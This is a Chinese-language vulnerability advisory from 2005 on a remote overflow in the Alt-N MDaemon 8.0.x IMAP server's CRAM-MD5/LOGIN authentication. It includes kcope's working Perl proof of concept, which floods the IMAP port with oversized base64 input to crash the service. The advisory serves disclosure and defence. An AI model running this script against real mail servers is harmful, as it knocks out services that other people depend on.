Alt-N MDaemon IMAP Server认证例程远程溢出漏洞
发布日期:2005-07-20
更新日期:2005-07-20
受影响系统:
Alt-N MDaemon 8.0.3描述:
Alt-N MDaemon 8.0.2
Alt-N MDaemon 8.0.1
Alt-N MDaemon 8.0
BUGTRAQ ID: 14317
Alt-N MDaemon是一款基于Windows的邮件服务程序。
Alt-N MDaemon IMAP Server中存在远程溢出漏洞,成功利用这个漏洞允许在服务程序的环境中执行任意代码。
攻击者可以通过发送特制的请求破坏进程内存,导致缓冲区溢出。
<*来源:kcope (kingcope@gmx.net)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
### MDAEMON remote DoS exploit by kcope
### looks like there?s a fault in the base64 decoder
### works also for AUTHENTICATE LOGIN
###
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '143',
Proto => 'tcp');
$a = "q" x 1000;
print $sock "a001 AUTHENTICATE CRAM-MD5\r\n";
print $sock $a,"\r\n";
print $sock $a,"\r\n";
while (<$sock>) {
print $_;
}
建议:
厂商补丁:
Alt-N
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.altn.com
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
